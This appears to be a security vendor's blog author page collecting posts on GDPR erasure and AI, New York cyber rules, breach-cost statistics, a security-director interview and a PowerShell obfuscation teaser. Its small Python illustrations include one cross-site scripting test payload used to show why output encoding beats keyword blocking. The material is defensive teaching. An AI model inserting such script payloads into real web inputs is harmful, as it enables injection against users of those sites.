All posts by Andy Green

The Right to Be Forgotten and AI

One (of the many) confusing aspects of the EU General Data Protection Regulation (GDPR) is its “right to be forgotten”. It’s related to the right to erasure but takes in far more ground. The right to have your personal data deleted means that data held by the data controller must be removed on request by the consumer. The right to be forgotten refers more specifically to personal data the controller has made public on the Intertoobz.

Simple, right?

It ain’t ever that easy.

I came across a paper on this subject that takes a deeper look at the legal and technical issues around erasure and “forgetting”. We learn from the authors that deleting means something different when it comes to big data and artificial intelligence versus data held in a file system.

This paper contains great background on the recent history of the right to be forgotten, which is well worth your time.

Brief Summary of a Summary

Way back in 2010, a Mr. Costeja González brought a complaint against Google and a Spanish newspaper to Spain’s national Data Protection Authority (DPA). He noticed that when he entered his name into Google, the search results displayed a link to a newspaper article about a property sale made by Mr. González to resolve his personal debts.

The Spanish DPA dismissed the complaint against the newspaper, which had a legal obligation to publish the property sale. However, the DPA allowed the one against Google to stand.

Google’s argument was that since it didn’t have a true presence in Spain – no physical servers in Spain held the data – and the data was processed outside the EU, it wasn’t under the EU Data Protection Directive (DPD).

Ultimately, in its 2014 right to be forgotten ruling, the EU’s highest judicial body, the Court of Justice, said that: search engine companies are controllers; the DPD applies to companies that market their services in the EU (regardless of physical presence); and consumers have the right to request that search engine companies remove links that reference their personal information.

With the GDPR becoming EU law in May 2018 and replacing the DPD, the right to be forgotten is now enshrined in Article 17, and the extraterritorial scope of the decision can be found in Article 3.

However, what’s interesting about this case is that the original information about Mr. González was never deleted — it can still be found if you search the online version of the newspaper.

So the “forgetting” part means, in practical terms, that a key or link to the personal information has been erased, but not the data itself.

Hold this thought.

Artificial Intelligence Is Like a Mini-Google

The second half of this paper starts with a very good computer science 101 look at what happens when data is deleted in software. For non-technical people, this part will be eye opening.

Technical types know that when you’re done with a data object in an app and its memory is “freed”, the data does not in fact magically disappear. Instead, the memory chunk is put on a “linked list” that will eventually be processed and then made part of available software memory to be re-used again.

When you delete data, it’s actually put on a “take out the garbage” list.

This procedure is known as garbage collection, and it allows performance-sensitive software to delay the CPU-intensive data disposal to a later point when the app is not as busy.
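To make the idea concrete, here’s a toy sketch of deferred deletion (illustrative only: real collectors in CPython or the JVM are far more sophisticated, and the email address is made up). Freeing an object merely queues its chunk on a garbage list; the bytes survive until a later collection pass scrubs and recycles them.

```python
# Toy model of deferred deletion via a "garbage" list: free() only queues
# the chunk, and the underlying bytes survive until collect() runs.

class ToyHeap:
    def __init__(self):
        self.chunks = {}       # handle -> bytearray ("allocated memory")
        self.garbage = []      # freed handles awaiting collection
        self.free_pool = []    # scrubbed chunks available for reuse
        self._next = 0

    def alloc(self, data: bytes) -> int:
        handle = self._next
        self._next += 1
        self.chunks[handle] = bytearray(data)
        return handle

    def free(self, handle: int) -> None:
        # "Delete": the handle goes on the garbage list, but the
        # underlying bytes are untouched for now.
        self.garbage.append(handle)

    def collect(self) -> None:
        # The deferred, CPU-intensive part: actually wipe and recycle.
        for handle in self.garbage:
            chunk = self.chunks.pop(handle)
            chunk[:] = b"\x00" * len(chunk)   # scrub the data
            self.free_pool.append(chunk)
        self.garbage.clear()

heap = ToyHeap()
h = heap.alloc(b"jane.doe@example.com")   # hypothetical personal data
heap.free(h)
# Freed, but before collection the personal data is still in memory:
still_there = bytes(heap.chunks[h])
heap.collect()
gone = h not in heap.chunks
```

Until `collect()` runs, anyone holding the handle can still read the “deleted” personal data, which is exactly the gap the paper’s authors worry about.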

Machine learning uses large data sets to train the software and derive decision making rules. The software is continually allocating and deleting data, often personal data, which at any given moment might be on a garbage collection queue waiting to be disposed.

What does it mean then to implement right to be forgotten in an AI or big data app?

The authors of the paper make the point that eliminating a single data point is not likely to affect the AI software’s rules. Fair enough. But certainly if tens or hundreds of thousands of consumers exercise their right to erasure under the GDPR, then you’d expect some of these rules to shift.

They also note that data can be disguised through certain anonymity techniques or pseudonymization as a way to avoid storing identifiable data, thereby getting around the right to be forgotten. Some of these anonymity techniques involve adding “noise”, which may affect the accuracy of the rules.
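As an illustration of that noise trade-off, here’s a minimal sketch that adds Laplace-style noise (the mechanism behind differential privacy) to a simple statistic. The salary figures are made up, and real systems calibrate the noise scale to a formal privacy budget; the point is just that more noise means more privacy but a less accurate answer.

```python
# Sketch: Laplace-style noise applied to a mean. Larger scale = more
# privacy but a less accurate statistic. All data here is fictional.
import math
import random

random.seed(42)

salaries = [52_000, 61_000, 58_000, 75_000, 49_000]   # fictional personal data
true_mean = sum(salaries) / len(salaries)             # 59,000

def noisy_mean(values, scale):
    # Draw Laplace(0, scale) noise via inverse-CDF sampling
    u = random.random() - 0.5
    noise = -scale * math.copysign(1.0, u) * math.log(1 - 2 * abs(u))
    return sum(values) / len(values) + noise

low_noise = noisy_mean(salaries, scale=100)       # small noise: near the truth
high_noise = noisy_mean(salaries, scale=10_000)   # heavy noise: far less accurate
```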

This leads to an approach to implementing right to be forgotten for AI that we alluded to above: perhaps one way to forget is to make it impossible to access the original data!

A garbage collection process does this by putting the memory in a separate queue that makes it unavailable to the rest of the software—the software’s “handle” to the memory no longer grants access.  Google does the same thing by removing the website URL from its internal index.

In both cases, the data is still there but effectively unavailable.

The Memory Key

The underlying idea behind AI forgetting is that you remove or delete the key that allows access to the data.

This paper ends by suggesting that we’ll need to explore more practical (and economic) ways to handle right to be forgotten for big data apps.

Losing the key is one idea. There are additional methods that can be used: for example, to break up the personal data into smaller sets (or silo them) so that it is impossible or extremely difficult to re-identify each separate set.
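One concrete version of “losing the key” is crypto-shredding: encrypt each person’s data under its own key, and forget them by destroying that key. Here’s a minimal sketch using a toy XOR stream cipher built from SHA-256; a production system would use a vetted cipher such as AES-GCM, and the stored record is invented for illustration.

```python
# "Forgetting by losing the key" (crypto-shredding), sketched with a toy
# SHA-256-based XOR stream cipher. Real systems would use AES-GCM or similar.
import hashlib
import secrets

def keystream(key: bytes, n: int) -> bytes:
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:n]

def xor(data: bytes, key: bytes) -> bytes:
    # XOR is its own inverse, so this both encrypts and decrypts
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

keys = {}      # per-person key store
records = {}   # ciphertext store (could live in a big-data lake)

def store(person: str, data: bytes) -> None:
    keys[person] = secrets.token_bytes(32)
    records[person] = xor(data, keys[person])

def read(person: str) -> bytes:
    return xor(records[person], keys[person])

def forget(person: str) -> None:
    del keys[person]   # ciphertext stays behind, but is now unreadable

store("gonzalez", b"property sale notice")
readable = read("gonzalez")
forget("gonzalez")
ciphertext_remains = "gonzalez" in records
key_gone = "gonzalez" not in keys
```

After `forget()`, the data is still physically there, just like the newspaper article, but without the key it is effectively unavailable.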

Sure, removing personal data from a file system is not necessarily easy, but it’s certainly solvable with the right products!

Agreed: AI forgetting involves additional complexity and solutions to the problem will differ from file deletion. It’s possible we’ll see some new erasure-like technologies in the AI area as well.

In the meantime, we’ll likely receive more guidance from EU regulators on what it means to forget for big data applications. We’ll keep you posted!

New York State Cyber Regulations Get Real

We wrote about NY’s innovative cyber regulations earlier this year. For those who don’t remember, the NY State Department of Financial Services (NYSDFS) launched GDPR-like cyber security regulations for its massive financial industry, including requirements for 72-hour breach reporting, limited data retention, and designation of a chief information security officer.

As legal experts have noted, New York leads the rest of the states in its tough data security rules for banks, insurance, and investment companies. And after Equifax, it has proposed extending these rules to credit reporting agencies that operate in the state.

Transition Period Has Ended

The NYS rules are very process-oriented and similar to the GDPR in requiring documented security policies, response planning, and assessments – basically you have to be able to “show your work”.

However, unlike the GDPR, there are also specific technical requirements that have to be complied with: for example, pen testing, multi-factor authentication, and limiting access privileges.

Anyway, the cyber regulations went into effect on March 1, 2017, but most of the rules have a 180-day grace period. That period ended in late August.

There are exceptions.

Some of the more technical requirements were extended up to one year (March 1, 2018): for example, performing pen testing and vulnerability assessments and conducting periodic risk assessments. And up to 18 months for implementing audit trails and application-level security.

So NY financial companies have a little extra time for the nittier rules.

However, that does mean that the 72-hour breach reporting rule is in effect!

Varonis Can Help

I’d like to add that the NYSDFS rules on breach reporting cover a far broader type of cyber event than any other state. Typically, state breach rules have language that requires notification for the exposure of certain types of PII data — see our totally awesome graphics to instantly visualize this.

While these NY rules protect similar types of PII as other states – social security and credit card numbers as well as online identifiers – financial companies in New York will also have to report on cyber events, defined as follows:

Cybersecurity Event means any act or attempt, successful or unsuccessful, to gain unauthorized access to, disrupt or misuse an Information System or information stored on such Information System.

Note the language covering any attempt to gain access or to disrupt or misuse a system. This encompasses not only standard data exposures where personal data is stolen, but also denial-of-service (DoS), ransomware, and any kind of post-exploitation where the system tools are leveraged and misused.

Based on my reading and looking closely at the state’s FAQ, financial companies will have to notify NY regulators within 72 hours of data exposures involving PII and cybersecurity events “that have a reasonable likelihood of materially harming” normal operations – see Section 500.17.

With data attacks now becoming the new normal, this tough notification rule — first in the US! — will likely require IT departments to put in significant technical effort to meet this tight timeline.

Varonis can help NY financial companies.

Ask to see a demo of our DatAlert product and get right with NYSDFS!


My Big Fat Data Breach Cost Post, Part II

This article is part of the series "My Big Fat Data Breach Cost Series". Check out the rest:

If I had to summarize the first post in this series in one sentence, it’s this: as a single number, the average is not the best way to understand a dataset. Breach cost averages are no exception! And when that dataset is skewed or “heavy tailed”, the average is even less meaningful.

With this background, it’s easier to understand what’s going on with the breach cost controversy as it’s being played out in the business press. For example, this article in Fortune magazine does a good job of explaining the difference between Ponemon’s breach costs per record stolen and Verizon’s statistic.

Regressions Are Better

The author points out that Ponemon does two things that overstate their cost per record average. One, they include indirect costs in their model — potential lost business, brand damage, and other opportunity costs. While I’ll get to this in the next post, Ponemon’s qualitative survey technique is not necessarily bad, but their numbers have to be interpreted differently.

The second point is that Ponemon’s $201 per record average is not a good predictor, as is the case with any raw average, and for skewed datasets it’s an especially unhelpful number.

According to our friends at the Identity Theft Resource Center (ITRC), which tracks breach stats, we’ve now reached over 1,000 breach incidents with over 171 million records taken. Yikes!

Based on Ponemon’s calculations, American business has experienced $201 x 171 million or about $34 billion worth of data security damage. That doesn’t make any financial sense.

Verizon’s average of $.58 per record is based on reviewing actual insurance claim data provided by NetDiligence. This average is also deficient because it likely understates the problem — high deductibles and restrictive coverage policies play a role.

Verizon, by the way, has said this number is also way off! They were making a point about averages being unreliable (and taking a little dig at Ponemon).

The Fortune article then discusses Verizon’s log-linear regression, and reminds us that breach costs don’t grow at a linear rate. We agree on that point! The article also excerpts the table from Verizon that shows how different per record costs would apply for various ranges. I showed that same table in the previous post, and further below we’ll try to do something similar with incident costs.

In the last post, we covered the RAND model’s non-linear regression, which incorporates other factors besides record counts. Jay Jacobs also has a very simple model that’s better than a strict linear fit. Verizon, RAND, and Jacobs’ regressions are all far better at predicting costs than a single average number.

I’ll make one last point.

The number of data records involved in a breach can be hard to nail down. The data forensics often can’t accurately say what was taken: was it 10,000 records or 100,000? The difference may amount to whether a single file was touched, and a factor of ten difference can change $201 per record to $20!
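The arithmetic behind that factor-of-ten swing, using a hypothetical fixed incident cost:

```python
# The same fixed incident cost spread over an uncertain record count:
# ten times the records means one-tenth the cost per record.
incident_cost = 201 * 10_000                # $2,010,000 total, hypothetical
per_record_10k = incident_cost / 10_000     # $201 per record
per_record_100k = incident_cost / 100_000   # $20.10 per record
```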

A more sensible approach is to look at the costs per incident. This average, as I wrote about last time, is a little more consistent, and is roughly in the $6 million range based on several different datasets.

The Power of Power Laws

Let’s gets back to the core issue of averages. Unfortunately, data security stats are very skewed, and in fact the distributions are likely represented by power laws. The Microsoft paper, Sex, Lies and Cyber-Crime Surveys, makes this case, and also discusses major problems — under-sampling and misreporting — of datasets that are based on power laws: in short, a few data points have a disproportionate effect on the average.

Those who are math phobic and curl up into fetal position when they see an equation or hear the word “exponent” can skip to the next section without losing too much.

Let’s now look at the table from the RAND study, which I showed last time.

An incident of $750 million indicates that this is a spooky dataset. Boooo!

Note that the median cost for an incident — see the bottom total — is $250,000 while the average cost of $7.84 million is an astonishing 30 times as great! And the maximum value for this dataset contains a monster-ish $750 million incident. We ain’t dealing with a garden variety bell-shaped or normal curve.

When the data is guided by power law curves, these leviathans exist, but they wouldn’t show up in data conforming to the friendlier and more familiar bell curve.
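A quick simulation shows the effect. Drawing incident costs from a power-law (Pareto) distribution, with illustrative parameters rather than anything fitted to the actual RAND data, the sample mean towers over the median:

```python
# Simulating a heavy-tailed cost distribution: with power-law data the
# sample mean dwarfs the median, echoing RAND's $7.84M average vs.
# $250K median. Parameters are illustrative, not fitted to real data.
import random
from statistics import mean, median

random.seed(7)

# paretovariate(1.15) gives a density with tail exponent alpha = 2.15
costs = [250_000 * random.paretovariate(1.15) for _ in range(921)]

sample_median = median(costs)
sample_mean = mean(costs)
ratio = sample_mean / sample_median   # well above 1: a few monsters drag it up
```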

I’m now going to fit a power law curve to the above stats, or at least to the average — it’s a close enough fit for my purpose. The larger point is that you can have a fat-tailed dataset with the same average!

A brief word from our sponsor. Have I mentioned lately how great Wolfram Alpha is? I couldn’t have written this post without it. If I only had this app in high school. Back to the show.

The power law has a very simple form: it’s just the variable x, representing in this case the cost of an incident, raised to the negative power of alpha: x^(−α).

Simple. (Please don’t shout into your browser: I know there’s a normalizing constant, but I left it out to make things easier.)

I worked out an alpha of about 2.15 based on the stats in the above table, so the density falls off as x^(−2.15). The alpha, by the way, is the key to all the math that you have to do.
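For the curious, here is the normalizing constant I skipped, with a quick numerical sanity check: for a density f(x) = C·x^(−α) on [x_min, ∞), the constant works out to C = (α − 1)·x_min^(α−1).

```python
# Verifying the normalizing constant for a power-law density:
# f(x) = C * x**(-alpha) on [x_min, inf) with C = (alpha - 1) * x_min**(alpha - 1).
alpha = 2.15
x_min = 1.0
C = (alpha - 1) * x_min ** (alpha - 1)

def f(x):
    return C * x ** (-alpha)

# Crude trapezoid integration; the tail beyond 1,000 is only ~0.0004
total = 0.0
x, dx = x_min, 0.01
while x < 1_000:
    total += 0.5 * (f(x) + f(x + dx)) * dx
    x += dx
# total comes out very close to 1, as a proper probability density must
```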

However, what I really want to know is the weight or percentage of the total costs for all breach incidents that each segment of the sample contributes. I’m looking for a representative average for each slice of the incident population.

For example, I know that the median or 50% of the sample — that’s about 460 incidents — has incident costs below $1.8 million. Can I calculate the average costs for this group? It’s certainly not $7.84 million!

There’s a little bit more math involved, and if you’re interested, you can learn about the Lorenz curve here. The graph below compares the unequal distribution of total incidents costs (the blue curve) for my dataset versus a truly equal distribution (the 45-degree red line).

The Lorenz curve: beloved by economists and data security wonks. The 1% rule! (Vertical axis represents percent of total incident costs.)

As you ponder this graph — and play with it here — you see that the blue curve doesn’t really change all that much up to around the 80% or .8 mark.

For example, the median at .5 and below represents 9% of the total breach costs. Based on the stats in the above table, the total breach cost for all incidents is about $7.2 billion ($7.84 million x 921). So the first 50% of my sample represents a mere $648 million ($7.2 billion x .09). If you do a little more arithmetic, you find the average is about $1.4 million per incident for this group.
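If you model the costs as a pure Pareto tail, an idealization of my fit, the Lorenz curve even has a closed form, and it reproduces the numbers above:

```python
# Lorenz curve for a pure Pareto tail: with density exponent alpha = 2.15,
# the Pareto shape is a = alpha - 1 = 1.15, and
# L(p) = 1 - (1 - p)**(1 - 1/a) is the cost share of the cheapest fraction p.
alpha = 2.15
a = alpha - 1   # Pareto shape parameter

def lorenz(p: float) -> float:
    return 1 - (1 - p) ** (1 - 1 / a)

bottom_half_share = lorenz(0.5)      # ~9% of total costs ("Economy")
top_decile_share = 1 - lorenz(0.9)   # ~74% of total costs ("Business Class")
```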

The takeaway for this section is that most of the sample is not seeing an average incident cost close to $7.8 million! This also implies that at the tail there are monster data incidents pushing up the numbers.

The Amazing IOS Blog Data Incident Cost Table

I want to end this post with a simple table (below) that breaks average breach costs into three groups: let’s call them Economy, Economy Plus, and Business Class. This refers to the first 50% of the data incidents, the next 40%, and the last 10%. It’s similar to what Verizon did in their 2015 DBIR for per record costs.

                          Economy            Economy Plus       Business Class
Data incidents            460                368                92
Percent of total cost     9%                 15%                74%
Total costs               $648 million       $1 billion         $5.33 billion
Average costs             $1.4 million/incident  $2.7 million/incident  $58 million/incident

If you’ve made it this far, you deserve some kind of blog medal. Maybe we’ll give you a few decks of Cards Against IT if you can summarize this whole post in a single, concise paragraph and also explain my Lorenz curve.

In the next, and (I promise) last post in this series, I’ll try to tell a story based on the above table, and then offer further thoughts on the Verizon vs. Ponemon breach cost battle.

Storytelling with just numbers can be dangerous. There are limits to “data-driven” journalism, and that’s where Ponemon’s qualitative approach has some significant advantages!

[Transcript] Ofer Shezaf and Keeping Ahead of the Hackers

This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Inside Out Security: Today I’m with Ofer Shezaf, who is Varonis’s Cyber Security Director. What does that title mean? Essentially, Ofer’s here to make sure that our products help customers get the best security possible for their systems. Ofer has had a long career in data security and I might add is a graduate of Israel’s amazing Technion University.

Welcome, Ofer.

Ofer Shezaf: Thank you.

IOS: So I’d like to start off by asking you how have attackers and their techniques changed since you started in cyber security?

OS: Well, it does give away the fact that I’ve been here for a while. And the question is also an age-old question: some people will say that it’s an ever-evolving threat, and some would say it’s just the same time and time again.

My own opinion is that it’s a mixed bag. Techies would usually say that it’s all the same as usual. Actually, the technical attack vectors tend to be rather the same. So buffer overflows have been with us for probably 40 years, and SQL Injection for the last 20.

Nevertheless, everything around the technical attack vectors does change. And I think that the sophistication and the resources that the dark side is investing — it always amazes me how much it’s always increasing!

When Stuxnet appeared a few years back, targeting, you know, nuclear reactors in Iran, I thought it was just, you know, a game changer. Things will never be the same!

But today it seems to be that every political campaign tends to utilize the same techniques, so it’s amazing how much the bad guys are investing into those hacks. And that changes things.


IOS: Do you have any thoughts on the dark web, and now this new trend of actually buying productized malware? Do you think that is changing things?

OS: It certainly does change things. To generalize a bit, I think that the economy behind hacking has evolved a lot. It’s way more of a business and the dark web today is not a dark alley anymore. It’s more like a business arena.

And if you think about it, ransomware, which is a business model to make money out of malware, is using the same technical techniques as malware always did. But today’s dark web, plus the economic infrastructure of Bitcoin, enables it to be a real business, which is where it becomes riskier and more frightening to an extent.


IOS: At Varonis, we have obviously been focusing on … that attackers have had no problem, or fewer problems than in the past, getting inside. And that’s basically through phishing and some other techniques.

So do you think that IT departments have adapted to this new kind of threat environment where the attacker is better able to sort of get in, you know, in through the perimeter, or they have not adapted to these kinds of threats?

OS: So I must say I meet a lot of people working in IT security. And there are some smart guys out there. So they know what it’s about — we are not blind as an industry to the new risks. That said, the hackers are successful which implies that we are missing something! Based on results, we lose.

The question of why there is this misalignment of capabilities and results is the million-dollar question. My answer is a personal one: we don’t invest enough … I mean, it’s a nine-to-five sort of job to be in IT security, and it tends to be a lot more like policing, like physical security. We need to be into it. I coined a term for that: we need to do continuous security, as you’d think the army or military or police would do.


IOS: We spoke a little bit before this and you had talked about I guess Security Operation Centers or SOCs. So is that something you think that should be more a part of the security environment?

OS: Yeah. I mentioned continuous security but it’s just a term, and it might be worth sort of thinking about what it actually implies for an organization. So SOCs have been around for a while, Security Operation Centers. But they tend to, well, not take it all the way.

I think that we need to have people sitting there really 24-7 even in smaller organizations because it’s becoming, you know… You have a guard at the door even in smaller organizations. So you need someone in the SOC all the time.

And they don’t need just to react. They need to be proactive.

So they need to hunt, to look for the bad guys, to do rounds around the building if you think about it in physical terms. And if we do that, if people invest more time, more thinking … they’ll also feed back into the technical means, which are our primary security tools today.


IOS: Ofer, we often see a disconnect between the executive suite and people doing data security on the ground. Maybe that’s just appearing with all the breaches in the last few years. I’m not sure. If there are one or two things you could tell the C-level about corporate data security, what would they be?

OS: So I did mention one, which is how much we invest. I think there’s under-investment and investment, at the end of the day, is in the hands of the executives.

The other thing is rather contradictory maybe but it’s important and that’s the fact that there is no total security … The only system which is entirely secure is a system which has no users and doesn’t operate. So it’s all about risk management. If it’s about risk management, it implies that we have to make choices and it also implies that we will be hacked.

And if we will be hacked, we need to make sure fewer and less important systems are affected, and we also have to make sure that we have the right plans for the day after. What will we do when we are hacked?

So things like separating systems that are important, defining which are the business-critical systems, those that your stock would drop if they are hacked, and which are peripheral and important, but less so.


IOS: So we’ve often talked about Privacy by Design on the IOS blog, but as you told me, the term is actually older. It really comes out of Security by Design, which is more of a programming term. And that really means that developers should consider security as they’re developing, as they’re actually making the app.

I was wondering if this approach of Security by Design where we’re actually doing the security from the start will really lessen the likelihood of breaches in the coming years. Or will we need more incentives to get these applications to be more secure?

OS: So we are moving from operational security, which is after systems are put in place and then they are protected, into designing their security upfront before we start deploying them. So it’s … the other part. I spent many years in application security, which is right around that.

And I think that the concept of baking security into the development process makes sense to everyone. It saves money later on because you don’t have to fix things when they’re found, and it also has the benefit of making systems more secure.

That said, it’s not a new concept. I mentioned that Security by Design is a term that’s been used for a decade and a half. It doesn’t happen enough, and the question is why? Why is Security by Design not happening as much as we would like it to, and how do we make it better?

And I think that the key to that is that developers are not measured by security! They are measured by how much they output in terms of functionality. Quality is important but it’s measured in terms of failures rather than security breaches. And security is someone else’s problem so it’s not the developer problem or the developing manager problem.

As long as we don’t change that, as long as they don’t think of security as an important goal of the development process, it will be a leftover, something done as an afterthought.


IOS: Well, it sounds like we may need other incentives here. And so for example, I can go to a store and buy a light bulb, and I know it has been certified by some outside agency. In the United States, it’s Underwriters Lab. There are a few others that do that.

Do you think we may see something like that, an outside certification saying that this software meets some minimal security requirements?

OS: So it goes back to compliance versus real security … I think compliance and regulations are important for addressing market deficiencies. So when things do not work because the right incentives aren’t there, it’s an important starting point.

That said, they are there, they’re just not providing enough. They’re also not, today, targeted specifically at the development phase, and in most cases, they are taken to be part of the operational phase, which is later on.

So it would be an interesting idea to try to create regulations specifically for the development process. It’s harder because we make end-result regulations … we don’t make good software requirements!

That said, I’ve once seen an interesting demonstration. Somebody created a label for software, which is like the label you have on food, with the ingredients saying how much, you know, how much SQL injections it might have and how much cross-site scripting it might have, as you would have for sugars and fats …


IOS: It is quite an interesting idea! At the blog, we’ve written a lot about pen testing, and actually, we’ve also spoken to a few actual testers. You know, obviously, this is another way to deal with … improving security in an organization. I’m wondering, how do you feel about hiring these outside pen testers?

OS: So first of all, by definition, it’s the opposite of Security by Design. It usually comes in later in the game once the system is ready. So if I said I believe in security by design then pen testing seems to be less important. That said, because Security by Design doesn’t work well, pen testing is needed. It’s very much an educational phase where you bring people in, and they tell you that you didn’t do right.

Why I don’t see this as more than educational?  First, because pen testers usually are given just as much time as was allocated. You know, it’s money at the end of the day, and today the bad guys are just investing more.

It’s not a holistic way to make the software secure, it’s an … opportunistic one, and usually it gets some things, but it doesn’t get all the things … It’s good for education — would show there is an issue  — but it’s not good enough to make sure that we are really secure.

IOS: That’s right.

OS: That said, it is important … Two things which are important when you do pen testing. The first one is since pen testers find just some of the issues, make sure that those are used to create a thought process around the larger challenges of the software!

So if they found a cross-site scripting in a specific place, don’t just fix this one, fix all of the cross-site scriptings … or think why your system was not built to overcome cross-site scripting in the first place. Take it [as a]  driver for security by design.

As an anecdote, I once met an organization where a pen tester came in, he found cross-site scripting. He demonstrated it by having the app popping up a “gotcha” dialogue. And two weeks later, the developers came back and said they fixed it. It doesn’t happen anymore, and what they did was just to check for the word “gotcha” in their input and block it, which is…it does happen, unfortunately!

And beyond fixing this, it would be well, if you have pen testing and they found cross-site scripting, fine, to think about why your system, in the first place, was not built to handle those across the board.
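The difference between that patch and a systemic fix can be sketched in a few lines (the payload and function names here are made up for illustration):

```python
# The anti-pattern from the anecdote vs. the systemic fix: blocking the
# pen tester's literal payload ("gotcha") vs. encoding all untrusted
# output so any script injection is rendered inert.
import html

def naive_fix(user_input: str) -> str:
    # What the developers did: block the one string the tester used
    if "gotcha" in user_input:
        return ""
    return user_input            # still vulnerable to everything else!

def systemic_fix(user_input: str) -> str:
    # Fix the class of bug: HTML-encode untrusted data on output
    return html.escape(user_input)

payload = "<script>alert('pwned')</script>"
leaked = naive_fix(payload)      # the script sails right through
encoded = systemic_fix(payload)  # rendered as harmless text
```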

The second thing that’s very important is pen testing is usually done very late in the development lifecycle. And too many times, there’s just not enough time to fix things. So making it earlier, making part of the, you know, test as models are released rather than last moment, will ensure that more can be fixed before launch … those systems are less vulnerable.


IOS: We also know that Microsoft has started addressing some long-standing security gaps … starting with Windows 10. There’s also Windows 10 S, which is Microsoft’s special security configuration for 10. I was wondering if you can tell us what 10 S is doing that may help organizations with their security.

OS: So Windows 10 S is the whitelisting version. If you think about security, there are two options to secure things, and nearly every security system selects one. One of them is to allow everything in general and then try to block what’s dangerous, okay? An anti-virus would be a good example: install whatever you want to install, and then the anti-virus will catch it if it’s a virus.

The second option, whitelisting, is always more secure, but always limits functionality more. Windows 10 S takes this approach. It limits software installation to only things that actually come from the Microsoft App Store.

So it’s way more limited, functionality speaking, sort of feels as it is less of a full system. And personally, you know, [as] an IT guy being here for quite a while, it feels too limited for me. But looking at how — you know, my kids are using computers — how, you know, general office workers are using computers, it might be just enough.

So it might be a good choice by Microsoft to create those limited versions that are secure by design because they allow just as much rather than blocking what’s wrong.
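The two approaches Ofer contrasts can be sketched as install checks (the app and store names are made up):

```python
# Blocklist vs. allowlist, the two security approaches described above,
# sketched as install checks. A blocklist allows by default; an
# allowlist (the Windows 10 S model) denies by default.
BLOCKLIST = {"known_virus.exe"}                # anti-virus style
ALLOWLIST = {"store_app_1", "store_app_2"}    # app-store style

def blocklist_allows(app: str) -> bool:
    return app not in BLOCKLIST

def allowlist_allows(app: str) -> bool:
    return app in ALLOWLIST

# A brand-new, never-before-seen piece of malware:
new_malware = "fresh_malware.exe"
blocklist_result = blocklist_allows(new_malware)   # slips through
allowlist_result = allowlist_allows(new_malware)   # blocked by default
```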

IOS: Right. If I understand what you’re saying, it would prevent, let’s say, malware from being loaded because the malware wouldn’t have been signed, so it wouldn’t have been loaded on the actual whitelist of …

OS: It’s not just signed, it’s actually downloaded from the Microsoft App Store, so it’s way more … Signing exists in Windows today; this is the next step.

IOS: So then it would really prevent anything from being…any outside software from being loaded. Okay. And … is there a performance penalty for that?

OS: As far as I know there is no performance penalty. In a way, having more security in this case might actually improve performance and stability, because unpredicted software is also a challenge for performance and stability. The downside is functionality.


IOS: Right. We know from security analysts that hackers and cybercriminals have targeted executives (they call it, you know, spear phishing or whale phishing) and, you know, executives have more valuable information compared to the average employee.

So it would sort of make sense to actually target these people. I was wondering if you think that executives should receive extra security protections, or whether they should take extra precautions, you know, in their day-to-day work on the computer?

OS: So in a way, you said it all, because we do know that executives are targeted more, so we need to focus on securing them. We do it in the real world … drawing parallels with the physical security world, so it does make sense.  … A lot of our security controls are automated, and when it’s automated, if you invest in detecting that somebody is posing as the user, why stop at executives?

So my take on that would be: make the automated detection systems address any user, but then focus. It still gets to an incident response team that has to assess whether the risk is there and what to do. They can prioritize based on the type of user — executives being one type of sensitive user, by the way. Of course, admins are another type.

IOS: Yeah, I mean, I could almost imagine a, I guess, like a SOC having a special section just focused on executives and perhaps looking at … any kind of notifications or alerts that come up from the, you know, the standard configuration. But actually, digging a little deeper when those things come up with the executives.

OS: Yes, if you think about it, the major challenge of a SOC is handling the flow of alerts. And any means that will enable them to be more efficient in handling alerts, focusing on those that are more critical to the business where the risk is higher, is important. Executives are a very good example.

So just pop the alerts about the executives to the top of the list, and the analyst gets to them first and is doing something reasonable. He is more valuable to the organization.

In fact, there is no 100% security! Some incidents or alerts will be left unhandled.


IOS: One last question. Any predictions on hacking trends in the next few years? I mean, are there new techniques on the horizon that we should be paying closer attention to?

OS: Oh, it’s a crystal ball question. It’s always hard. I’m probably wrong, but I’ll try.

So the way to look into that, the way to try to predict, is that I’ve found that hacking techniques usually trail changes in IT technology. Hackers become experts in a new technology only a year or two, or even more than that, after the technology becomes widespread. In this respect, I think that mobile is the next front.

We all use mobile, but business use of mobile — the Salesforce mobile app, for example — is rather new. In the last couple of years, we can actually do more work on the mobile device, which means it’s a good target for malware. And I think we’ve seen malware for mobile, but we still haven’t seen financial or enterprise malware — ransomware for mobile, for example — and that will be coming.

IOS: And what about Internet of Things — it is kind of somewhat related to mobile — as a new trend? Are we starting to see some of that?

OS: Yes, it’s an area where we’ve seen two things. First of all, a lot of research, which always comes before actual real-world use. If you look at what researchers are doing today, you know what hackers will do in two or three years!

And to date, we’ve seen mostly denial-of-service attacks against, you know, Internet of Things devices, where they were taken off the network.

It would be interesting — it would be frightening actually — once the bad guys start to do more innovative damage by taking over devices. You know, cars are a very frightening example, of course, traffic lights, electricity controllers, etc.

That said, the business model is the driving factor. And unlike, for example, malware for mobile or malware on cloud systems, I still don’t see the business model, apart from nation states, around the Internet of Things.

IOS: It’s interesting! So, Ofer, thank you for joining us. This was a really fascinating discussion, and it’s good to get this perspective from someone who’s been in the business for such a long time.

OS: Thank you. My pleasure as well.

Catching Up With Varonis Tech Evangelist Brian Vecci


Who was that incredibly knowledgeable security pro on CNBC talking about the Equifax breach? That familiar face and voice belong to none other than our own Brian Vecci. If you’ve been following Varonis on Twitter or LinkedIn, you’re likely aware that Brian has been on CNBC before.

And he’s made a lot of other media appearances. So we asked our amazing research staff to track down Brian’s recent interview activity — not surprisingly, he’s been busy! We’ve embedded a few of his interviews below. So sit back and enjoy Mr. V’s high-bandwidth conversations.

CNBC: Equifax Breach

CNBC: Consumer Security Advice

Nightly Business Report (NBR): WannaCry Ransomware

Security Guy TV (Black Hat 2017): Insider Security

Cybersecurity Journal (Black Hat): Data Is a Business Asset

PowerShell Obfuscation: Stealth Through Confusion, Part II


This article is part of the series "PowerShell Obfuscation". Check out the rest:

Let’s step back a little from the last post’s exercise in jumbling PowerShell commands. Obfuscating code as a technique to avoid detection by malware and virus scanners (or prevent reverse engineering) is nothing really new. If we go back into the historical records, there’s this (written in Perl).  What’s the big deal, then?

